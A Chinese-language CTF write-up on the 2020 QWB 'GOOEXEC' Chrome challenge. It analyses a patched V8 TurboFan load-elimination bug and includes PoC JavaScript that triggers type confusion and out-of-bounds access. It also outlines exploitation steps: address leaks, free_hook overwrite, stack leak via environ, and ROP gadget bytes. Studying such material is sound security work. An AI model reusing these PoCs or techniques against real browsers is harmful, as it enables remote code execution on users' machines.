2020 QWB GOOEXEC -> chrome
浏览器的新手,发布文章是希望大佬们批评指正
@Wi1L 邮箱:[email protected]
0 环境搭建
首先确定v8的版本
然后对应拉取文件,打补丁,编译
1 内存情况
本部分主要搞清楚BigUint64Array、object、arr的分布情况
演示脚本
var obj_array = {m:0xdead,n:'a'};
var big_uint_array = new BigUint64Array(6);
big_uint_array[0] = 0x1234n;
big_uint_array[1] = 0x5678n;
//console.log("oob_array len " + oob_array.length);
%DebugPrint(obj_array);
%DebugPrint(big_uint_array);
%SystemBreak();
BigUint64Array
object_array
hex(0xdead<<1) ===> ‘0x1bd5a’
in-object的情况下
下面看一个脚本
a = [0.1];
%DebugPrint(a);
%SystemBreak();
a[0] = {};
%DebugPrint(a);
%SystemBreak();
起初的内存情况
之后的内存情况
通过上图,我们可以看到,如果此时还可以通过double数组的形式访问a[0],那么这个a[0]实际上就是上图的map处,形成类型混淆,这里可以拓展下,其实是修改4字节
2 背景知识
源码中的一些类、结构
// Abstract state to approximate the current map of an object along the
// effect paths through the graph. <===沿着effect path推测一个object可能的map 放到state中
class AbstractMaps final : public ZoneObject {
public:
explicit AbstractMaps(Zone* zone);
AbstractMaps(Node* object, ZoneHandleSet<Map> maps, Zone* zone);
AbstractMaps const* Extend(Node* object, ZoneHandleSet<Map> maps,
Zone* zone) const;
bool Lookup(Node* object, ZoneHandleSet<Map>* object_maps) const;
AbstractMaps const* Kill(const AliasStateInfo& alias_info,
Zone* zone) const;
bool Equals(AbstractMaps const* that) const {
return this == that || this->info_for_node_ == that->info_for_node_;
}
AbstractMaps const* Merge(AbstractMaps const* that, Zone* zone) const;
void Print() const;
private:
ZoneMap<Node*, ZoneHandleSet<Map>> info_for_node_; <====这个是所有可能map的set
};
内存申请的总结
a = [1.1,2.2];
这个时候如果
a[0] = {};
1 、在内存中会重新申请element空间,
2、整体的element架构{map 、length、object_ptr 、double_heap_number_ptr}
详见ppt 下面也有double+SMI的情况 内存分布
checkmaps
参考先知的一篇文章
v8 exploit – RealWorld CTF2019 accessible – 先知社区 (aliyun.com)
对于JS类型的不稳定性,v8中有两种方式被用来保证runtime优化代码中对类型假设的安全性
-
通过添加CheckMaps节点来对类型进行检查,当类型不符合预期时将会bail out
-
以dependency的方式。将可能影响map假设的元素添加到dependencies中,通过检查这些dependency的改变来触发回调函数进行deoptimize
3 漏洞分析
总
这里先给一下我的理解,patch文件删除的地方是一个state = state->KillMaps(alias_info, zone());,这个函数的作用是
对AbstractState进行一个更新。具体更新的内容是,检查node,如果两个node对应一个对象的话,其中一个node的map信息发生变化,对应的另一个node的map信息进行killmaps
LoadElimination::AbstractState const* LoadElimination::AbstractState::KillMaps(
const AliasStateInfo& alias_info, Zone* zone) const {
if (this->maps_) {
AbstractMaps const* that_maps = this->maps_->Kill(alias_info, zone);//这里是对state对应的maps进行kill
if (this->maps_ != that_maps) {
AbstractState* that = zone->New<AbstractState>(*this);
that->maps_ = that_maps;
return that;//这里返回的是一个state
}
}
return this;
}
上面的kill函数对应的就是下面这个
LoadElimination::AbstractMaps const* LoadElimination::AbstractMaps::Kill(
const AliasStateInfo& alias_info, Zone* zone) const {
for (auto pair : this->info_for_node_) {//遍历
if (alias_info.MayAlias(pair.first)) {
AbstractMaps* that = zone->New<AbstractMaps>(zone);//maps zone
for (auto pair : this->info_for_node_) {
if (!alias_info.MayAlias(pair.first)) that->info_for_node_.insert(pair);
}
return that;//这里返回的是map的set
}
}
return this;
}
info_for_node_指的是一个Node可能的map的set
MayAlias 是判断两个是不是Node可能对应一个对象
pair 可以存放两个任意类型的object
LoadElimination::AbstractMaps::Kill 的作用是删掉所有可能对应同一个对象的alias_Node
所以整个LoadElimination::AbstractState::KillMaps在这里是:如果一个Node的map类型改变了,其别名Node的map应该被kill掉,patch中删掉了这个,可能使得两个是同一个对象的Node对应的maps值不同,造成类型混淆
针对reduceCheckmap
Reduction LoadElimination::ReduceCheckMaps(Node* node) {
ZoneHandleSet<Map> const& maps = CheckMapsParametersOf(node->op()).maps();
Node* const object = NodeProperties::GetValueInput(node, 0);
Node* const effect = NodeProperties::GetEffectInput(node);
AbstractState const* state = node_states_.Get(effect);
if (state == nullptr) return NoChange();
ZoneHandleSet<Map> object_maps;
// 假如object_maps的Map信息并不完整,可能导致maps.contains错误地返回true
if (state->LookupMaps(object, &object_maps)) {
if (maps.contains(object_maps)) return Replace(effect); <=====如果走到这里就删掉了checkmap
// TODO(turbofan): Compute the intersection.
}
state = state->SetMaps(object, maps, zone());
return UpdateState(node, state);
}
maps.contains(object_maps)这个的作用是前面是不是包含后面
maps是之前进行过一次store操作对应的map
object_maps是当前state针对具体的Node推测的map信息
根据poc,前面b[0] = 1.1 所以maps应该对应fix_double_array,由于b数组一直没有改变,所以其state推测没有变,但是对应位置的内存被a数组修改了,从而造成类型混淆。这里由于killmaps删除了,如果不删除这个的话,a数组修改内存时也会导致object_maps发生变化,从而bail out
过程
贴一下patch脚本
diff --git a/src/compiler/load-elimination.cc b/src/compiler/load-elimination.cc
index ff79da8c86..8effdd6e15 100644
--- a/src/compiler/load-elimination.cc
+++ b/src/compiler/load-elimination.cc
@@ -866,8 +866,8 @@ Reduction LoadElimination::ReduceTransitionElementsKind(Node* node) {
if (object_maps.contains(ZoneHandleSet<Map>(source_map))) {
object_maps.remove(source_map, zone());
object_maps.insert(target_map, zone());
- AliasStateInfo alias_info(state, object, source_map);
- state = state->KillMaps(alias_info, zone());
+ // AliasStateInfo alias_info(state, object, source_map);
+ // state = state->KillMaps(alias_info, zone());
state = state->SetMaps(object, object_maps, zone());
}
} else {
@@ -892,7 +892,7 @@ Reduction LoadElimination::ReduceTransitionAndStoreElement(Node* node) {
if (state->LookupMaps(object, &object_maps)) {
object_maps.insert(double_map, zone());
object_maps.insert(fast_map, zone());
- state = state->KillMaps(object, zone());
+ // state = state->KillMaps(object, zone());
state = state->SetMaps(object, object_maps, zone());
}
// Kill the elements as well.
从上面可以看出来是个优化漏洞
修改位置对应的函数
Reduction LoadElimination::ReduceTransitionElementsKind(Node* node) {
ElementsTransition transition = ElementsTransitionOf(node->op());
Node* const object = NodeProperties::GetValueInput(node, 0);
Handle<Map> source_map(transition.source());
Handle<Map> target_map(transition.target());
Node* const effect = NodeProperties::GetEffectInput(node);
AbstractState const* state = node_states_.Get(effect);
if (state == nullptr) return NoChange();
switch (transition.mode()) {
case ElementsTransition::kFastTransition:
break;
case ElementsTransition::kSlowTransition:
// Kill the elements as well.
AliasStateInfo alias_info(state, object, source_map);
state = state->KillField(
alias_info, FieldIndexOf(JSObject::kElementsOffset, kTaggedSize),
MaybeHandle<Name>(), zone());
break;
}
ZoneHandleSet<Map> object_maps;
if (state->LookupMaps(object, &object_maps)) {
if (ZoneHandleSet<Map>(target_map).contains(object_maps)) {
// The {object} already has the {target_map}, so this TransitionElements
// {node} is fully redundant (independent of what {source_map} is).
return Replace(effect);
}
if (object_maps.contains(ZoneHandleSet<Map>(source_map))) {
object_maps.remove(source_map, zone());
object_maps.insert(target_map, zone());
// AliasStateInfo alias_info(state, object, source_map);
// state = state->KillMaps(alias_info, zone());
state = state->SetMaps(object, object_maps, zone());
}
} else {
AliasStateInfo alias_info(state, object, source_map);
state = state->KillMaps(alias_info, zone());
}
return UpdateState(node, state);
}
从上到下分析函数,记录不会的地方
通过调试,可以发现transition的值以及其source_map与target_map
pwndbg> p transition $1 = { mode_ = v8::internal::compiler::ElementsTransition::kSlowTransition, source_ = { <v8::internal::HandleBase> = { location_ = 0x55bd921c03c8 }, <No data fields>}, target_ = { <v8::internal::HandleBase> = { location_ = 0x55bd921c03e8 }, <No data fields>} }
查看node 以及其op的状态
pwndbg> p *node $6 = { static kOutlineMarker = 15, static kMaxInlineCapacity = 14, op_ = 0x55b73b589a10, type_ = { payload_ = 0 }, mark_ = 26, bit_field_ = 855638065, first_use_ = 0x55b73b589af8 } pwndbg> p *node->op_ $7 = { <v8::internal::ZoneObject> = {<No data fields>}, members of v8::internal::compiler::Operator: _vptr$Operator = 0x7f48ded306b0 <vtable for v8::internal::compiler::Operator1<v8::internal::compiler::ElementsTransition, v8::internal::compiler::OpEqualTo<v8::internal::compiler::ElementsTransition>, v8::internal::compiler::OpHash<v8::internal::compiler::ElementsTransition> >+16>, mnemonic_ = 0x7f48dc157777 "TransitionElementsKind", opcode_ = 293, properties_ = { mask_ = 32 ' ' }, value_in_ = 1, effect_in_ = 1, control_in_ = 1, value_out_ = 0, effect_out_ = 1 '\001', control_out_ = 0 }
(1) node的effect?
Node* const effect = NodeProperties::GetEffectInput(node);
(2) 源码与内存匹配解读
Reduction LoadElimination::ReduceTransitionElementsKind(Node* node) { ElementsTransition transition = ElementsTransitionOf(node->op()); Node* const object = NodeProperties::GetValueInput(node, 0); <=====这里是a Handle<Map> source_map(transition.source());<===fixed_double Handle<Map> target_map(transition.target());<===object Node* const effect = NodeProperties::GetEffectInput(node); AbstractState const* state = node_states_.Get(effect); if (state == nullptr) return NoChange(); switch (transition.mode()) { case ElementsTransition::kFastTransition: break; case ElementsTransition::kSlowTransition: // Kill the elements as well. AliasStateInfo alias_info(state, object, source_map); state = state->KillField( alias_info, FieldIndexOf(JSObject::kElementsOffset, kTaggedSize), MaybeHandle<Name>(), zone()); break; } ZoneHandleSet<Map> object_maps; if (state->LookupMaps(object, &object_maps)) {<========这里进行了赋值object_maps是fixed_double if (ZoneHandleSet<Map>(target_map).contains(object_maps)) {<==这里检测object是不是包含fixed_double // The {object} already has the {target_map}, so this TransitionElements // {node} is fully redundant (independent of what {source_map} is). return Replace(effect); } if (object_maps.contains(ZoneHandleSet<Map>(source_map))) {<=这里检测fixed_double是不是包含fixed_double //如果包含就进行map的替换,同时更改其别名Node的map(但是这里被删了) object_maps.remove(source_map, zone()); object_maps.insert(target_map, zone()); // AliasStateInfo alias_info(state, object, source_map); // state = state->KillMaps(alias_info, zone()); state = state->SetMaps(object, object_maps, zone()); } } else { AliasStateInfo alias_info(state, object, source_map); state = state->KillMaps(alias_info, zone()); } return UpdateState(node, state); }
(3) 对ReduceCheckMap的调试 (感觉这个比较关键,需要知道每一个变量是啥,然后追两个函数)
Reduction LoadElimination::ReduceCheckMaps(Node* node) { ZoneHandleSet<Map> const& maps = CheckMapsParametersOf(node->op()).maps(); <===之前的fixed_double Node* const object = NodeProperties::GetValueInput(node, 0); Node* const effect = NodeProperties::GetEffectInput(node); AbstractState const* state = node_states_.Get(effect); if (state == nullptr) return NoChange(); ZoneHandleSet<Map> object_maps; if (state->LookupMaps(object, &object_maps)) { <=====我跟进了lookupmaps函数 <========这里进行了赋值object_maps是fixed_double <====当前的状态map if (maps.contains(object_maps)) return Replace(effect); <====追一下contains函数 <===之前的状态map是不是含有当前的状态map // TODO(turbofan): Compute the intersection. } state = state->SetMaps(object, maps, zone()); return UpdateState(node, state); }
poc.js
–no-enable-slow-asserts
/************************************************************* //set args --allow-natives-syntax ../../../codejs/2020_qwb_Goo/poc1.js --no-enable-slow-asserts ************************************************************/ function opt(a, b) { b[0] = 0; a.length; // TransitionElementsKind a[0] = 0; b[0] = 9.431092e-317; }; %PrepareFunctionForOptimization(opt); let holey_obj_arr = new Array(1); holey_obj_arr[0] = 'a'; let packed_double_arr1 = [1.1] opt(holey_obj_arr, packed_double_arr1); opt(holey_obj_arr, packed_double_arr1); let packed_double_arr2 = [2.2] opt(packed_double_arr2, packed_double_arr1); opt(packed_double_arr2, packed_double_arr1); %OptimizeFunctionOnNextCall(opt); let evil_arr = [0.1]; %SystemBreak(); readline(); %DebugPrint(evil_arr); opt(evil_arr, evil_arr); %DebugPrint(evil_arr); print(evil_arr[0]);
看一下POC导致的内存变化
之前的内存情况
DebugPrint: 0x23c008148981: [JSArray] - map: 0x23c0083038fd <Map(PACKED_DOUBLE_ELEMENTS)> [FastProperties] - prototype: 0x23c0082cb529 <JSArray[0]> - elements: 0x23c008148971 <FixedDoubleArray[1]> [PACKED_DOUBLE_ELEMENTS] - length: 1 - properties: 0x23c0080426dd <FixedArray[0]> { 0x23c008044649: [String] in ReadOnlySpace: #length: 0x23c008242159 <AccessorInfo> (const accessor descriptor) } - elements: 0x23c008148971 <FixedDoubleArray[1]> { 0: 0.1 } 0x23c0083038fd: [Map] - type: JS_ARRAY_TYPE - instance size: 16 - inobject properties: 0 - elements kind: PACKED_DOUBLE_ELEMENTS - unused property fields: 0 - enum length: invalid - back pointer: 0x23c0083038d5 <Map(HOLEY_SMI_ELEMENTS)> - prototype_validity cell: 0x23c008242445 <Cell value= 1> - instance descriptors #1: 0x23c0082cb9dd <DescriptorArray[1]> - transitions #1: 0x23c0082cba29 <TransitionArray[4]>Transition array #1: 0x23c008044f5d <Symbol: (elements_transition_symbol)>: (transition to HOLEY_DOUBLE_ELEMENTS) -> 0x23c008303925 <Map(HOLEY_DOUBLE_ELEMENTS)> - prototype: 0x23c0082cb529 <JSArray[0]> - constructor: 0x23c0082cb2c5 <JSFunction Array (sfi = 0x23c00824f7a5)> - dependent code: 0x23c0080421b5 <Other heap object (WEAK_FIXED_ARRAY_TYPE)> - construction counter: 0
之后的情况
DebugPrint: 0x23c008148981: [JSArray] - map: 0x23c008303975 <Map(HOLEY_ELEMENTS)> [FastProperties] - prototype: 0x23c0082cb529 <JSArray[0]> - elements: 0x23c0081489cd <FixedArray[1]> [HOLEY_ELEMENTS] - length: 1 - properties: 0x23c0080426dd <FixedArray[0]> { 0x23c008044649: [String] in ReadOnlySpace: #length: 0x23c008242159 <AccessorInfo> (const accessor descriptor) } - elements: 0x23c0081489cd <FixedArray[1]> {
脚本中a[0] = {},对于内存的变化是FixedDoubleArray ===> FixedArray,从而element指针也进行了重新内存分配
但是由于漏洞,b[0] = 9.431092e-317时;会将这个对象当作数组处理,从而使得这个指针指向的位置被修改成我们的值。
可以从上图中看出,map信息被修改了
针对2019大佬师傅blog的理解
执行arr2[0]=1.1,此时因为state仍然认为arr2是FixedDoubleArray的Map,所以会把的unboxed array的store操作前面的CheckMaps给删除掉。但是此时arr2的Element已经是FixedArray了,那么等于把一个unboxed double写入了一个存放指针的slot,即再访问arr[0]就可以产生类型混淆了 这里的unboxed array指的就是arr数组, unboxed double就是指向arr具体元素的指针(在内存里看,就是element指针)
这段话使用poc具体的调试一下
实际上这个并没有触发第3步,所生成的store操作是把一个double object的指针存放到FixedArray里面去,而不是直接存unboxed double。卡了很久之后,我猜想到的原因是在profiling JIT所用的类型信息时,执行arr2[0] = 1.1的时候因为arr2已经是个FixedArray的Array了,所以收集到的就是arr2是<Map(HOLEY_ELEMENTS)>的类型信息,导致生成的就是处理arr2的Element是FixedArray的JIT代码。所以要防止这一点,我们必须得保证在JIT前执行arr2[0] = 1.1的时候arr2必须是<Map(HOLEY_DOUBLE_ELEMENTS)>, unboxed double指的是直接一次索引(数组element位置存储)存储值,而这里(double object 下图有解释)是一个object指针 现在相当于 array / arr =====> {map,proto,elememt} element===>{map,...,double obj ptr} double obj ptr===>{heapnumber_map,1.1} 而我们想达到的效果是修改double obj ptr位置(这个位置应该是存放一个map) HOLEY_ELEMENTS相对于HOLEY_DOUBLE_ELEMENTS多了一次索引,即jit并没有成功的将arr2看成一个double_array
poc
function f(arr, arr2) { arr[0] = 1.1; arr2[0] = 2.2; // [1] arr[0] = {}; // [2] arr2[0] = 1.1; // [3] } let a; for (let i = 0; i < 0x2000; i++) { a = Array(0); f(a, a); a = Array(0); f(a, a); } a = Array(1); a[0] = 0.1; %DebugPrint(a); %SystemBreak(); f(a, a); %DebugPrint(a); %SystemBreak(); print(a[0]);
第一次print
DebugPrint: 0x2825081de289: [JSArray] - map: 0x282508303925 <Map(HOLEY_DOUBLE_ELEMENTS)> [FastProperties] - prototype: 0x2825082cb529 <JSArray[0]> - elements: 0x2825081de2a9 <FixedDoubleArray[1]> [HOLEY_DOUBLE_ELEMENTS] - length: 1 - properties: 0x2825080426dd <FixedArray[0]> { 0x282508044649: [String] in ReadOnlySpace: #length: 0x282508242159 <AccessorInfo> (const accessor descriptor) } - elements: 0x2825081de2a9 <FixedDoubleArray[1]> { 0: 0.1 } 0x282508303925: [Map] - type: JS_ARRAY_TYPE - instance size: 16 - inobject properties: 0 - elements kind: HOLEY_DOUBLE_ELEMENTS - unused property fields: 0 - enum length: invalid - back pointer: 0x2825083038fd <Map(PACKED_DOUBLE_ELEMENTS)> - prototype_validity cell: 0x282508242445 <Cell value= 1> - instance descriptors #1: 0x2825082cb9dd <DescriptorArray[1]> - transitions #1: 0x2825082cba41 <TransitionArray[4]>Transition array #1: 0x282508044f5d <Symbol: (elements_transition_symbol)>: (transition to PACKED_ELEMENTS) -> 0x28250830394d <Map(PACKED_ELEMENTS)> - prototype: 0x2825082cb529 <JSArray[0]> - constructor: 0x2825082cb2c5 <JSFunction Array (sfi = 0x28250824f7a5)> - dependent code: 0x2825080421b5 <Other heap object (WEAK_FIXED_ARRAY_TYPE)> - construction counter: 0
内存情况
第二次
DebugPrint: 0x2825081de289: [JSArray] - map: 0x282508303975 <Map(HOLEY_ELEMENTS)> [FastProperties] - prototype: 0x2825082cb529 <JSArray[0]> - elements: 0x2825081de2d5 <FixedArray[1]> [HOLEY_ELEMENTS] - length: 1 - properties: 0x2825080426dd <FixedArray[0]> { 0x282508044649: [String] in ReadOnlySpace: #length: 0x282508242159 <AccessorInfo> (const accessor descriptor) } - elements: 0x2825081de2d5 <FixedArray[1]> { 0: 0x2825082d2b95 <HeapNumber 1.1> } 0x282508303975: [Map] - type: JS_ARRAY_TYPE - instance size: 16 - inobject properties: 0 - elements kind: HOLEY_ELEMENTS - unused property fields: 0 - enum length: invalid - stable_map - back pointer: 0x28250830394d <Map(PACKED_ELEMENTS)> - prototype_validity cell: 0x282508242445 <Cell value= 1> - instance descriptors (own) #1: 0x2825082cb9dd <DescriptorArray[1]> - prototype: 0x2825082cb529 <JSArray[0]> - constructor: 0x2825082cb2c5 <JSFunction Array (sfi = 0x28250824f7a5)> - dependent code: 0x2825080421b5 <Other heap object (WEAK_FIXED_ARRAY_TYPE)> - construction counter: 0
内存情况
改进方法
function f(t1, t2, arr, arr2) { arr[0] = 1.1; arr2[0] = 2.2; if (t1) arr[0] = {}; if (t2) arr2[0] = 13.37; } let a; for (let i = 0; i < 0x2000; i++) { a = Array(0); f(true, false, a, a); a = Array(0); f(false, true, a, a); } a = Array(0); f(true, true, a, a); print(a[0]);
通过交叉实现目的
4 针对POC尝试
function opt(a, b) { b[0] = 0; a.length; // TransitionElementsKind for (let i = 0; i < 1; i++) a[0] = 0; b[0] = 9.431092e-317; } let arr1 = new Array(1); arr1[0] = 'a'; opt(arr1, [0]); let arr2 = [0.1]; opt(arr2, arr2); %SystemBreak(); %OptimizeFunctionOnNextCall(opt); opt(arr2, arr2); // assertEquals(9.431092e-317, arr2[0]); print (arr2[0]);
首先这个poc起初没有成功断在源码的位置,这就是个问题,之前确实成功断了下来,但是现在有点迷
因为这个poc是针对799263的,并不是我们要调试的qwb
另一个poc.js,这个主要是明白修改四字节导致数组溢出(主要是明白指针压缩)
function foo(a, b) { let tmp = {}; b[0] = 0; a.length; for(let i=0; i<a.length; i++){ a[i] = tmp; } let o = [1.1]; b[15] = 4.063e-320;//这里改的是后32位 , 虽然数组操作是64位的 return o; } let arr_addr_of = new Array(1); arr_addr_of[0] = 'a'; for(let i=0; i<10000; i++) { eval(`var tmp_arr = [1.1, 2, 3, 4, 5, 6, 7, 8, 9, 10, 11, 12, 13, 15, 16, 17, 18, 19, 20, 21, 22, 23, 24];`); foo(arr_addr_of, [1.1, 2, 3, 4, 5, 6, 7, 8, 9, 10, 11, 12, 13, 15, 16, 17, 18, 19, 20, 21, 22, 23, 24]); foo(tmp_arr, [1.1, 2, 3, 4, 5, 6, 7, 8, 9, 10, 11, 12, 13, 15, 16, 17, 18, 19, 20, 21, 22, 23, 24]); } var float_arr = [1.1, 2, 3, 4, 5, 6, 7, 8, 9, 10, 11, 12, 13, 15, 16, 17, 18, 19, 20, 21, 22, 23, 24]; %DebugPrint(float_arr); %SystemBreak(); var oob_array = foo(float_arr, float_arr, {}); %DebugPrint(float_arr); %SystemBreak(); console.log(oob_array.length);
这样构造的原因见 resource/2020qwbGoo.pdf
第一次
DebugPrint: 0x1d45081e1ef9: [JSArray] - map: 0x1d45083038fd <Map(PACKED_DOUBLE_ELEMENTS)> [FastProperties] - prototype: 0x1d45082cb529 <JSArray[0]> - elements: 0x1d45081e1e39 <FixedDoubleArray[23]> [PACKED_DOUBLE_ELEMENTS] - length: 23 - properties: 0x1d45080426dd <FixedArray[0]> { 0x1d4508044649: [String] in ReadOnlySpace: #length: 0x1d4508242159 <AccessorInfo> (const accessor descriptor) } - elements: 0x1d45081e1e39 <FixedDoubleArray[23]> { 0: 1.1 1: 2 2: 3 3: 4 4: 5 5: 6 6: 7 7: 8 8: 9 9: 10 10: 11 11: 12 12: 13 13: 15 14: 16 15: 17 16: 18 17: 19 18: 20 19: 21 20: 22 21: 23 22: 24 } 0x1d45083038fd: [Map] - type: JS_ARRAY_TYPE - instance size: 16 - inobject properties: 0 - elements kind: PACKED_DOUBLE_ELEMENTS - unused property fields: 0 - enum length: invalid - back pointer: 0x1d45083038d5 <Map(HOLEY_SMI_ELEMENTS)> - prototype_validity cell: 0x1d4508242445 <Cell value= 1> - instance descriptors #1: 0x1d45082cb9dd <DescriptorArray[1]> - transitions #1: 0x1d45082cba29 <TransitionArray[4]>Transition array #1: 0x1d4508044f5d <Symbol: (elements_transition_symbol)>: (transition to HOLEY_DOUBLE_ELEMENTS) -> 0x1d4508303925 <Map(HOLEY_DOUBLE_ELEMENTS)> - prototype: 0x1d45082cb529 <JSArray[0]> - constructor: 0x1d45082cb2c5 <JSFunction Array (sfi = 0x1d450824f7a5)> - dependent code: 0x1d45080421b5 <Other heap object (WEAK_FIXED_ARRAY_TYPE)> - construction counter: 0
内存情况
第二次
DebugPrint: 0x1d45081e1ef9: [JSArray] - map: 0x1d4508303975 <Map(HOLEY_ELEMENTS)> [FastProperties] - prototype: 0x1d45082cb529 <JSArray[0]> - elements: 0x1d45081e1f25 <FixedArray[23]> [HOLEY_ELEMENTS] - length: 23 - properties: 0x1d45080426dd <FixedArray[0]> { 0x1d4508044649: [String] in ReadOnlySpace: #length: 0x1d4508242159 <AccessorInfo> (const accessor descriptor) } - elements: 0x1d45081e1f25 <FixedArray[23]> { 0-22: 0x1d45081e1f09 <Object map = 0x1d45083022cd> } 0x1d4508303975: [Map] - type: JS_ARRAY_TYPE - instance size: 16 - inobject properties: 0 - elements kind: HOLEY_ELEMENTS - unused property fields: 0 - enum length: invalid - stable_map - back pointer: 0x1d450830394d <Map(PACKED_ELEMENTS)> - prototype_validity cell: 0x1d4508242445 <Cell value= 1> - instance descriptors (own) #1: 0x1d45082cb9dd <DescriptorArray[1]> - prototype: 0x1d45082cb529 <JSArray[0]> - constructor: 0x1d45082cb2c5 <JSFunction Array (sfi = 0x1d450824f7a5)> - dependent code: 0x1d45080421b5 <Other heap object (WEAK_FIXED_ARRAY_TYPE)> - construction counter: 0
突然发现忘记打印oobarray了…
重新操作下,简单记录
第一次
第二次
a[0] = {}这样的话在内存中是一个map值(obj的map)
5 How to write exp.js
5.0 v8 free_hook
可以通过 obj->constructor->code->text_addr 的⽅式来获取 text 段地址,有了 text 段地址就可以得到 libc 地址了,有了 libc 地址计算 得到 free hook 以及 system 地址,将 free_hook 改成 system ,然后触发释放就可以了。
5.1 chrome free_hook stack
chrome gdb调试的技巧
一个教程
https://brookhong.github.io/2016/10/09/debug-chrome-with-gdb.html
首先要清楚解析的是html文件,所以文件的名称要是对的
gdb中要设置可以调试子进程
set follow-fork-mode child
此外要开启chrome的调试选项
root下调试chrome,记得如何调整pwn-debug插件
启动chrome 访问我们开的python -m SimpleHttpServer服务,然后ps -axf | grep chrome ,然后root下使用gdb attach线程
做题的过程记录
现在我实现了这样
[+] float arr constructor addr: 0x000000000845e52d [+] code obj addr: 0x0000000000045661 [+] text addr: 0x00007f403ae39dc0 pwndbg> vmmap 0x00007f403ae39dc0 LEGEND: STACK | HEAP | CODE | DATA | RWX | RODATA 0x7f403ae0d000 0x7f403b903000 r-xp af6000 3bc000 /home/ubuntu2004/now/Release/libv8.so +0x2cdc0
我想泄露enrvion指针得到栈地址,所以我需要libc地址,所以我需要got表项(要被解析过的)
但是在我们找到text_addr的位置使用got命令,出现下面的问题
最终的标准是这样的
var text_base = text_addr - 0x2cdc0n - 0x3bd000n; // Hprint("[+] ttext_base: "+hex(text_base)); 根据命令推测 pwndbg> vmmap 0x00007f403ae39dc0 LEGEND: STACK | HEAP | CODE | DATA | RWX | RODATA 0x7f403ae0d000 0x7f403b903000 r-xp af6000 3bc000 /home/ubuntu2004/now/Release/libv8.so +0x2cdc0 <==================================第一个减的数字
我们要找的地址是下面的libc_base,所以还要减去后面的那个数字
找到了libc_base了,下一步是找到printf_got,因为上面的got命令失效,所以我使用了下面的方法
找到了got,利用任意读,泄露printf地址,进而泄露libc
这一步可以同时找到mprotect的地址
这里的libc指的应该是这个
之后查看environ的地址
通过这个读出栈地址
接下来就是构造rop链的问题
参考exp中使用的是text_base+off,这里尝试找到text_base搜索的方法,(应该也可以使用libc_base)
objdump -d vmlinux > gadget.txt vi gadget.txt 搜索即可
调试流程
首先起一个chrome
之后正常访问脚本
然后查看进程树
使用root权限开gdb 并附加进程
可能刚开始进程不对应,找到指定进程即可
vim搜索的下一个是 N , 上一个# (回车之后操作)
在找gadgets的时候出现问题,不太会搜gadgets
search -x ….. -e
使用pwndbg进行搜索(不过也可以使用linux内核的那个objdump,这个方法单纯搜ret好用一些,但是这种方法不能拆散之前成组的gadgets)
5a是pop rdx
所以这里写几个汇编的机器码
我们需要的是上面中存在与libcv8.so的(它这个是按地址进行从上到下搜索,所以通过vmmap v8 我们可以知道大概在哪里停下)
这里使用pwntools的asm功能生成
pop rdx,ret ; 5a c3 pop rdi,ret ; 5f c3 pop rsi,ret ; 5e c3 add rsp 0x78; pop rbx; pop rbp; ret; 4883c4785b5dc3
遇到新的问题,现在当我完成整个脚本的时候,不会调试。整个脚本的情况下,chrome直接崩溃,不给我调试的机会
目前的方法是在ret位置断点,因为chrome一直没有关,所以其实每次的libv8.so基地址相同,断点可以一直断
在我自己写的脚本中,ret一直段不下来
但是当我使用detach,出现/bin/xcalc….迷~~~(这个说明不了什么,说明我attach错了进程罢了)
当我在标准exp脚本的最后加上输出信息时,利用失败,可见最后部分不能随便加东西
字节的脚本crash的位置
RAX 0x834808ec834800c3 RBX 0x7fff5a9337f8 —▸ 0x2159c9217850 ◂— 0x70007400740068 /* 'h' */ RCX 0xffffffffffffffa0 RDX 0x0 RDI 0x7ffa6495c1ca ◂— ret RSI 0x7fff5a9337f8 —▸ 0x2159c9217850 ◂— 0x70007400740068 /* 'h' */ R8 0x7aec7a098a0 —▸ 0x1aff0c20dd00 ◂— 0x3300000003 R9 0x0 R10 0x7ffa66618506 ◂— '_ZN5blink18MainThreadDebugger15ExceptionThrownEPNS_16ExecutionContextEPNS_10ErrorEventE' R11 0x7ffa6788e610 ◂— push rbp R12 0x0 R13 0x1 R14 0x7ffa6495c1ca ◂— ret R15 0x33 RBP 0x7fff5a933830 —▸ 0x7fff5a933860 —▸ 0x7fff5a9338c0 —▸ 0x7fff5a933a50 —▸ 0x7fff5a933a90 ◂— ... RSP 0x7fff5a9337f0 ◂— 0x6f63222c3531333a (':315,"co') RIP 0x7ffa6d1f2d87 ◂— call qword ptr [rax + 0x130] ──────────────────────────────────────────────────────────────────────────────[ DISASM ]─────────────────────────────────────────────────────────────────────────────── ► 0x7ffa6d1f2d87 call qword ptr [rax + 0x130] 0x7ffa6d1f2d8d mov ebx, eax 0x7ffa6d1f2d8f cmp byte ptr [rbp - 0x21], 0 0x7ffa6d1f2d93 jns 0x7ffa6d1f2d9e <0x7ffa6d1f2d9e> 0x7ffa6d1f2d95 mov rdi, qword ptr [rbp - 0x38] 0x7ffa6d1f2d99 call 0x7ffa6d58c2b0 <0x7ffa6d58c2b0> 0x7ffa6d1f2d9e mov eax, ebx 0x7ffa6d1f2da0 add rsp, 0x20 0x7ffa6d1f2da4 pop rbx 0x7ffa6d1f2da5 pop r12 0x7ffa6d1f2da7 pop r14 ───────────────────────────────────────────────────────────────────────────────[ STACK ]─────────────────────────────────────────────────────────────────────────────── 00:0000│ rsp 0x7fff5a9337f0 ◂— 0x6f63222c3531333a (':315,"co') 01:0008│ rbx rsi 0x7fff5a9337f8 —▸ 0x2159c9217850 ◂— 0x70007400740068 /* 'h' */ 02:0010│ 0x7fff5a933800 ◂— 0x33 /* '3' */ 03:0018│ 0x7fff5a933808 ◂— 0x8000000000000038 /* '8' */ 04:0020│ 0x7fff5a933810 —▸ 0x2159c7fd1870 —▸ 0x7ffa6d61dd70 —▸ 0x7ffa6d1e2bd0 ◂— push rbp 05:0028│ 0x7fff5a933818 —▸ 0x7aec7a098a0 —▸ 0x1aff0c20dd00 ◂— 0x3300000003 06:0030│ 0x7fff5a933820 —▸ 0x7fff5a933880 —▸ 0x1aff0c20dd00 ◂— 0x3300000003 07:0038│ 0x7fff5a933828 —▸ 0x7fff5a933840 —▸ 0x1aff0c20dd00 ◂— 0x3300000003
对应的标准状态
